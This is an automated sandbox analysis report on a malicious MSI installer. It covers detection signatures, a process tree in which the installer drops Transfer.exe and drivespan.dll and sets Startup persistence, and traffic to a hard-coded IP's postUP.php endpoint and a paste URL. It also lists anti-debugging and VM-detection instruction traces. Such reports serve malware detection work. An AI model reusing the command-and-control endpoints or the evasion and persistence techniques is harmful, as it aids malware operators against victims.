Edit tour

Windows Analysis Report
Fct63e39.msi

Overview

General Information

Sample Name:	Fct63e39.msi
Analysis ID:	803457
MD5:	867c50852f18578fa033fa351ad79913
SHA1:	0ceba904d6ff7ad9696af3abd6d17a23645d9c40
SHA256:	01678f0b037b244a527b964aa9c32c5f7f554cbfb77305747cf42d5019775d4d
Tags:	msi
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Hides threads from debuggers

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Overwrites code with function prologues

Query firmware table information (likely to detect VMs)

Tries to evade analysis by execution special instruction (VM detection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Stores files to the Windows start menu directory

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Entry point lies outside standard sections

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Creates a start menu entry (Start Menu\Programs\Startup)

PE file contains more sections than normal

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5556 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Fct63e39.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 2040 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 4212 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F98DBCD8EB795A8D118A247529EBDDF4 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

Transfer.exe (PID: 2264 cmdline: C:\Users\user\Pictures\Transfer.exe MD5: E04F15D35A1807C4D74D2538D5FE28C9)

Transfer.exe (PID: 492 cmdline: "C:\Users\user\Pictures\Transfer.exe" MD5: E04F15D35A1807C4D74D2538D5FE28C9)

cleanup

HTTP traffic detected: GET /005/postUP.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 81.161.229.121Accept: text/html, */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)

Source: unknown	TCP traffic detected without corresponding DNS query: 81.161.229.121
Source: unknown	TCP traffic detected without corresponding DNS query: 81.161.229.121
Source: unknown	TCP traffic detected without corresponding DNS query: 81.161.229.121
Source: unknown	TCP traffic detected without corresponding DNS query: 81.161.229.121
Source: unknown	TCP traffic detected without corresponding DNS query: 81.161.229.121

Source: Transfer.exe, 00000003.00000002.581528162.00000000698A1000.00000020.00000001.01000000.00000004.sdmp, Transfer.exe, 00000006.00000002.508629839.00000000698A1000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: http://81.161.229.121/005/postUP.php
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Transfer.exe.1.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Transfer.exe.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: Transfer.exe.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Transfer.exe.1.dr	String found in binary or memory: http://s.symcd.com06
Source: Transfer.exe.1.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Transfer.exe.1.dr	String found in binary or memory: http://s2.symcb.com0
Source: Transfer.exe.1.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: Transfer.exe.1.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Transfer.exe.1.dr	String found in binary or memory: http://sv.symcd.com0&
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Transfer.exe.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Transfer.exe, 00000003.00000002.581196742.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, Transfer.exe, 00000003.00000002.581528162.00000000698A1000.00000020.00000001.01000000.00000004.sdmp, Transfer.exe, 00000006.00000003.507173820.0000000003280000.00000004.00001000.00020000.00000000.sdmp, Transfer.exe, 00000006.00000002.508629839.00000000698A1000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: Transfer.exe.1.dr	String found in binary or memory: http://www.nero.com
Source: Transfer.exe.1.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: Transfer.exe.1.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: Transfer.exe.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Transfer.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Transfer.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Transfer.exe, 00000003.00000002.581528162.00000000698A1000.00000020.00000001.01000000.00000004.sdmp, Transfer.exe, 00000006.00000002.508629839.00000000698A1000.00000020.00000001.01000000.00000004.sdmp	String found in binary or memory: https://rentry.co/e6oicv/raw
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: Fct63e39.msi, MSI8499.tmp.1.dr, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: global traffic

Source: Transfer.exe, 00000003.00000002.581036778.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI8235.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\5b7a94.msi

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_0088CD15

3_2_0088CD15

Source: Fct63e39.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs Fct63e39.msi
Source: Fct63e39.msi	Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs Fct63e39.msi

Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Section loaded: security.dll	Jump to behavior

Source: drivespan.dll.1.dr

Static PE information: Number of sections : 12 > 10

Source: Joe Sandbox View

Dropped File: C:\Windows\Installer\MSI8235.tmp FF86C76A8D5846B3A1AD58FF2FD8E5A06A84EB5899CDEE98E59C548D33335550

Source: C:\Users\user\Pictures\Transfer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Fct63e39.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F98DBCD8EB795A8D118A247529EBDDF4
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\Pictures\Transfer.exe C:\Users\user\Pictures\Transfer.exe
Source: unknown	Process created: C:\Users\user\Pictures\Transfer.exe "C:\Users\user\Pictures\Transfer.exe"
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F98DBCD8EB795A8D118A247529EBDDF4	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\Pictures\Transfer.exe C:\Users\user\Pictures\Transfer.exe	Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32

Jump to behavior

Source: Transfer.exe.lnk.3.dr

LNK file: ..\..\..\..\..\..\..\Pictures\Transfer.exe

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Acrobat Reader

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF8F74856D07287FC3.TMP

Jump to behavior

Source: classification engine

Classification label: mal84.evad.winMSI@7/26@0/1

Source: C:\Users\user\Pictures\Transfer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00881510 GetModuleFileNameW,GetCurrentProcessId,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Sleep,CloseHandle,Sleep,

3_2_00881510

Source: Fct63e39.msi

Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%

Source: C:\Users\user\Pictures\Transfer.exe

Mutant created: \Sessions\1\BaseNamedObjects\B9297DB4-C17F-42DD-B67C-7A713E42F839

Source: C:\Users\user\Pictures\Transfer.exe	Command line argument: -Restart	3_2_008817A0
Source: C:\Users\user\Pictures\Transfer.exe	Command line argument: drivespan.dll	3_2_008817A0
Source: C:\Users\user\Pictures\Transfer.exe	Command line argument: drivespan.dll	3_2_008817A0
Source: C:\Users\user\Pictures\Transfer.exe	Command line argument: run	3_2_008817A0

Source: C:\Users\user\Pictures\Transfer.exe

Window found: window name: TEdit

Jump to behavior

Source: Fct63e39.msi

Static file information: File size 19766784 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: Fct63e39.msi, MSI8499.tmp.1.dr
Source:	Binary string: c:\builds\workspace\Applications\Transfer_common\src\Release\Transfer.pdb source: Transfer.exe, 00000003.00000000.325975738.000000000088F000.00000002.00000001.01000000.00000003.sdmp, Transfer.exe, 00000003.00000002.580956216.000000000088F000.00000002.00000001.01000000.00000003.sdmp, Transfer.exe, 00000006.00000000.433088912.000000000088F000.00000002.00000001.01000000.00000003.sdmp, Transfer.exe, 00000006.00000002.508314347.000000000088F000.00000002.00000001.01000000.00000003.sdmp, Transfer.exe.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbl source: Fct63e39.msi, MSI8499.tmp.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Fct63e39.msi, MSI842B.tmp.1.dr, MSI8556.tmp.1.dr, MSI8235.tmp.1.dr

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00883016 push ecx; ret

3_2_00883029

Source: drivespan.dll.1.dr	Static PE information: section name: .didata
Source: drivespan.dll.1.dr	Static PE information: section name: .948
Source: drivespan.dll.1.dr	Static PE information: section name: .Ske
Source: drivespan.dll.1.dr	Static PE information: section name: .Rt_

Source: C:\Users\user\Pictures\Transfer.exe

Code function: 3_2_00881000 SHGetFolderPathW,PathFileExistsW,PathFileExistsW,PathFileExistsW,MoveFileExW,PathFileExistsW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryW,GetProcAddress,FreeLibrary,LoadLibraryW,GetProcAddress,FreeLibrary,FreeLibrary,

3_2_00881000

Source: initial sample

Static PE information: section where entry point is pointing to: .Rt_

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8499.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI842B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8235.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\Pictures\drivespan.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8556.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI839D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\Pictures\Transfer.exe	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8499.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI842B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8235.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8556.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI839D.tmp	Jump to dropped file

Source: C:\Users\user\Pictures\Transfer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnk

Jump to behavior

Source: C:\Users\user\Pictures\Transfer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Transfer.exe.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 9B0005 value: E9 FB 99 3B 77	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 77D69A00 value: E9 0A 66 C4 88	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 9C0007 value: E9 7B 4C 3E 77	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 77DA4C80 value: E9 8E B3 C1 88	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 9E0005 value: E9 FB BF 35 77	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 77D3C000 value: E9 0A 40 CA 88	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: A00008 value: E9 AB E0 37 77	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 77D7E0B0 value: E9 60 1F C8 88	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: A10005 value: E9 CB 5A BC 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 775D5AD0 value: E9 3A A5 43 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: A20005 value: E9 5B B0 BD 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 775FB060 value: E9 AA 4F 42 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: A30005 value: E9 DB F8 0F 74	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 74B2F8E0 value: E9 2A 07 F0 8B	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: A40005 value: E9 FB 42 11 74	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 2264 base: 74B54300 value: E9 0A BD EE 8B	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1310005 value: E9 FB 99 A5 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 77D69A00 value: E9 0A 66 5A 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1320007 value: E9 7B 4C A8 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 77DA4C80 value: E9 8E B3 57 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1530005 value: E9 FB BF 80 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 77D3C000 value: E9 0A 40 7F 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1550008 value: E9 AB E0 82 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 77D7E0B0 value: E9 60 1F 7D 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1560005 value: E9 CB 5A 07 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 775D5AD0 value: E9 3A A5 F8 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1570005 value: E9 5B B0 08 76	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 775FB060 value: E9 AA 4F F7 89	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1580005 value: E9 DB F8 5A 73	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 74B2F8E0 value: E9 2A 07 A5 8C	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 1590005 value: E9 FB 42 5C 73	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 74B54300 value: E9 0A BD A3 8C	Jump to behavior

Overwrites code with function prologues

Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 77D3C000 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 775D5AD0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 775FB060 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 74B2F8E0 value: 8B FF 55 8B EC	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Memory written: PID: 492 base: 74B54300 value: 8B FF 55 8B EC	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\msiexec.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\Pictures\Transfer.exe	System information queried: FirmwareTableInformation	Jump to behavior

Tries to evade analysis by execution special instruction (VM detection)

Source: C:\Users\user\Pictures\Transfer.exe	Special instruction interceptor: First address: 000000006BBD18F7 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Pictures\Transfer.exe	Special instruction interceptor: First address: 000000006BBECA40 instructions rdtsc caused by: RDTSC with Trap Flag (TF)

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Pictures\Transfer.exe	RDTSC instruction interceptor: First address: 000000006BBECA40 second address: 000000006BD05C1E instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push edi 0x00000004 pushfd 0x00000005 mov edi, 5C400C28h 0x0000000a add di, di 0x0000000d jnc 00007F7FC4B517C3h 0x00000013 mov edi, dword ptr [esp+edi-5C40184Ch] 0x0000001a mov dword ptr [esp+04h], F5E981D1h 0x00000022 push dword ptr [esp+00h] 0x00000026 popfd 0x00000027 lea esp, dword ptr [esp+04h] 0x0000002b call 00007F7FC4F03B11h 0x00000030 push ebp 0x00000031 push edx 0x00000032 cwd 0x00000034 movzx edx, cx 0x00000037 push ecx 0x00000038 mov bp, bp 0x0000003b pushfd 0x0000003c push esi 0x0000003d sal bp, 0037h 0x00000041 sar edx, cl 0x00000043 push ebx 0x00000044 setl bh 0x00000047 btc si, 0005h 0x0000004c movsx ebp, si 0x0000004f push edi 0x00000050 shr bl, FFFFFFD8h 0x00000053 push eax 0x00000054 lahf 0x00000055 rdtsc
Source: C:\Users\user\Pictures\Transfer.exe	RDTSC instruction interceptor: First address: 000000006BB78059 second address: 000000006BB7806F instructions: 0x00000000 rdtsc 0x00000002 pop esi 0x00000003 inc eax 0x00000004 rcl bh, cl 0x00000006 dec ecx 0x00000007 adc ebp, 107B1508h 0x0000000d inc bh 0x0000000f inc ecx 0x00000010 pop ebp 0x00000011 lahf 0x00000012 inc ecx 0x00000013 mov dl, EBh 0x00000015 pop ebx 0x00000016 rdtsc
